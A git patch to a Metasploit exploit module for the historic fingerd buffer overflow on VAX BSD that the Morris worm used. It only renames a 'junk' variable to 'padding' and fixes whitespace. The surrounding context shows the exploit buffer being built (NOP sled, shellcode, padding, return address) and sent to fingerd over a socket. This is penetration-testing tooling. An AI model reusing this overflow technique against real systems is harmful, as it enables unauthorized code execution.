From 8a402da056f99d0c3b69edb6ca7c76a609af7468 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 22 Nov 2018 23:10:57 -0600
Subject: [PATCH] Explain "junk" in buffer for morris_fingerd_bof

And unrelated whitespace changes because I suck.
---
 modules/exploits/bsd/finger/morris_fingerd_bof.rb | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/bsd/finger/morris_fingerd_bof.rb b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
index 6366a64c54..02101309c5 100644
--- a/modules/exploits/bsd/finger/morris_fingerd_bof.rb
+++ b/modules/exploits/bsd/finger/morris_fingerd_bof.rb
@@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
     # 0x01 is NOP in VAX-speak
     nops = "\x01" * (target.payload_space - shellcode.length)
 
-    # This overwrites part of the buffer
-    junk = rand_text_alphanumeric(109)
+    # This pads past buffer corruption
+    padding = rand_text_alphanumeric(109)
 
     # This zeroes out part of the stack frame
     frame = "\x00" * 16
 
     # Finally, pack in our return address
-    ret  = [target.ret].pack('V') # V is for VAX!
+    ret = [target.ret].pack('V') # V is for VAX!
 
     # The newline is for gets(3)
-    sploit = nops + shellcode + junk + frame + ret + "\n"
+    sploit = nops + shellcode + padding + frame + ret + "\n"
 
     # Fire away
     print_status('Connecting to fingerd')
     connect
     print_status("Sending #{sploit.length}-byte buffer")
     sock.put(sploit)
-
   # Hat tip @bcoles
   rescue Rex::ConnectionError => e
     fail_with(Failure::Unreachable, e.message)